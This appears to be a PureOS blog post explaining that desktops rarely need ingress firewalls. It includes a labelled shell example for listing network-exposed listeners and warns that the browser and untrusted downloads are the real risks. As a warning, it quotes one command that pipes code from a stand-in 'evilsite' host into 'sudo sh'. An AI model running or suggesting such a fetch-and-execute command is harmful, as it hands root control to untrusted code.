When deciding whether to use any particular security measure, it’s useful to understand what the threat is and how the security measure might address it. In the case of a firewall, the threat is usually from an attacker accessing or attacking a service over the network that is only intended for trusted IPs. So if you have a database server, you might use a firewall to limit access to particular IP address ranges on your internal network. You might block all but internally routable IP addresses, just in case the database gets exposed to the bare Internet. Or you might forgo using a firewall and focus your attention instead on strong authentication measures so only trusted, authenticated clients can talk to the database. Or you might do all of the above so you have defense in depth.
Most desktop distributions (like PureOS) do not enable a firewall by default because there is little value in it: these days there are usually no services running on the desktop distribution by default that are listening for incoming (ingress) connections that you would want to firewall off from the outside world. Most desktop distributions don’t even enable SSH by default. From the outside world, there is little for an attacker to attack over the network that a firewall would help with. While you could block outgoing connections, since the distribution doesn’t know what kind of services and networks you may want to connect to, it can’t effectively set up outgoing (or egress) firewall rules.
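To check this claim on your own machine, the following added example (not code from PureOS or from the original article) filters the output of `ss -H -tuln` from iproute2 down to listeners bound to non-loopback addresses, which are the only ones an ingress firewall would protect. The function names and the sample input are constructed for illustration.

```shell
#!/bin/sh
# Added example: list sockets listening on non-loopback addresses.
# Live use on a desktop:  ss -H -tuln | exposed_listeners

# Reads `ss -H -tuln` lines on stdin; prints "proto address port" for each
# listener bound to something other than loopback.
exposed_listeners() {
    awk '
    {
        port = $5; sub(/.*:/, "", port)        # text after the last colon
        addr = $5; sub(/:[^:]*$/, "", addr)    # text before the last colon
        sub(/%.*/, "", addr)                   # drop interface scope (%lo)
        sub(/^\[/, "", addr); sub(/\]$/, "", addr)   # drop IPv6 brackets
        # Loopback-only listeners are unreachable from other hosts.
        if (addr ~ /^127\./ || addr == "::1" || addr ~ /^::ffff:127\./) next
        print $1, addr, port
    }'
}

# Constructed sample: a desktop where the user has enabled SSH and mDNS,
# alongside loopback-only CUPS and a local DNS stub resolver.
sample_ss_output() {
    cat <<'EOF'
udp   UNCONN 0      0            0.0.0.0:5353       0.0.0.0:*
udp   UNCONN 0      0      127.0.0.53%lo:53         0.0.0.0:*
tcp   LISTEN 0      4096       127.0.0.1:631        0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      4096           [::1]:631           [::]:*
tcp   LISTEN 0      128             [::]:22            [::]:*
EOF
}

sample_ss_output | exposed_listeners
```

Empty output means nothing on the machine is reachable from the network, so an ingress firewall would have nothing to filter; any line that does appear is a service to either firewall, bind to loopback, or protect with strong authentication.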
The main risk of attack on a desktop isn’t from an attacker accessing a web server, database, or other service running on the desktop (it normally wouldn’t be running any of these services). The main risk comes from the web browser, which is constantly downloading and executing untrusted JavaScript from every website you visit. The secondary risk comes from downloading and executing code from an untrusted source outside of the web browser, whether that’s from an email attachment or blindly following a “curl www.evilsite.evil/badcode | sudo sh” installation document online.
For the first risk, PureOS has offered PureBrowser in the past, which enabled some privacy-enhancing extensions by default. Recently we started making the transition over to Epiphany, both to align better with PureOS on the Librem 5 and to make it easier to sandbox web apps on the desktop, first with the native Epiphany features that make a site a web app, and ultimately by wrapping the browser in technology like bubblewrap.
The second risk is why we stress the importance of downloading and installing software from our trusted and signed PureOS repository. As we expand the “PureOS Store”, we will do so with applications that are reproducibly built, so you have an extra degree of safety when installing them.